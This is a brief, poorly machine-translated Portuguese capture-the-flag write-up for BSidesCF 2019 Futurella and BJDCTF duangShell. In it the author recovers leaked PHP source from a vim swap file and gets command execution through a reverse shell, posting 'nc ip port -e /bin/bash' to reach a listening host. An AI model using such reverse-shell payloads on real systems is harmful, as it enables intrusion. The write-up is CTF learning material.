Artigo Diretório
[BSidesCF 2019] Futurella
Há muito tempo não vi um assunto tão simples, e latindo
todo tinha um marciano, não consigo ler a fonte de visualização
[BJDCTF 2o] duangShell
Cliquei e descobri que o código-fonte do swp vazou.
Usando o vim -r index.php.swp
arquivo de recuperação.
Aqui eu sei que a função exec é semelhante ao sistema, mas não há eco, então os parâmetros que passei girl_friend=print_r(scandir(dirname(__FILE__)))
não serão exibidos.
Depois de ler o wp de outras pessoas, descobri que só podemos usar o método shell reverso. De acordo com os prompts,
como a máquina de destino ambiental desta questão não pode acessar a rede externa, uma máquina de destino de intranet é necessária para fazê-lo. Aqui, o Linux Labs in Basic recomendado na questão é usado diretamente. Como esta máquina de destino foi instalada com lâmpada, Indique o serviço http, use o xshell para se conectar ao host
Posição de rebote 1 (sem sucesso)
Eu não sei porque eu não posso passar o
shell reverso
. ? ?
Posição de rebote 2
parâmetros de postagem:nc ip port -e /bin/bash
Este drone é realmente uma porcaria